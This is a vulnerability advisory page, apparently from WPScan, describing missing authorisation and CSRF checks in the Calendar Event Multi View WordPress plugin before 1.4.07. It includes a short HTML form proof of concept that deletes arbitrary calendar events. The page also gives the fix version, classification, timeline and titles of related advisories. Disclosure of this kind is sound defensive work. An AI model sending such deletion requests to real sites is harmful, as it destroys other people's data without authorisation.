Calendar Event Multi View < 1.4.07 – Unauthenticated Arbitrary Event Deletion | Plugin Vulnerabilities

Description

The plugin does not have any authorisation and CSRF checks in place when deleting events which could allow unauthenticated attackers to delete arbitrary events

Proof of Concept

As an unauthenticated user, open the code below, this will delete the event with ID 4 from the calendar with ID 1

<html>
  <body>
    <form action="https://example.com/?cpmvc_do_action=mvparse&f=datafeed&method=remove&calid=1" method="POST">
      <input type="hidden" name="calendarId" value="4" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

cp-multi-view-calendar

Fixed in 1.4.07

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

5f191d25-833b-4d8d-a4ff-d180a326dd82

Timeline

Publicly Published

2022-08-19 (about 3 years ago)

Added

2022-08-19 (about 3 years ago)

Last Updated

2022-09-29 (about 3 years ago)

Other

Published

Title

Published

2024-08-23

Title

ImageRecycle pdf & image compression < 3.1.15 - Missing Authorization in Several AJAX Actions

Published

2025-10-04

Title

TS Demo Importer <= 0.1.2 - Missing Authorization

Published

2025-11-24

Title

PropertyHive < 2.1.13 - Missing Authorization

Published

2026-03-20

Title

My Tickets – Accessible Event Ticketing < 2.1.2 - Missing Authorization

Published

2023-05-09

Title

SALERT < 1.2.2 - Subscriber+ Missing Authorization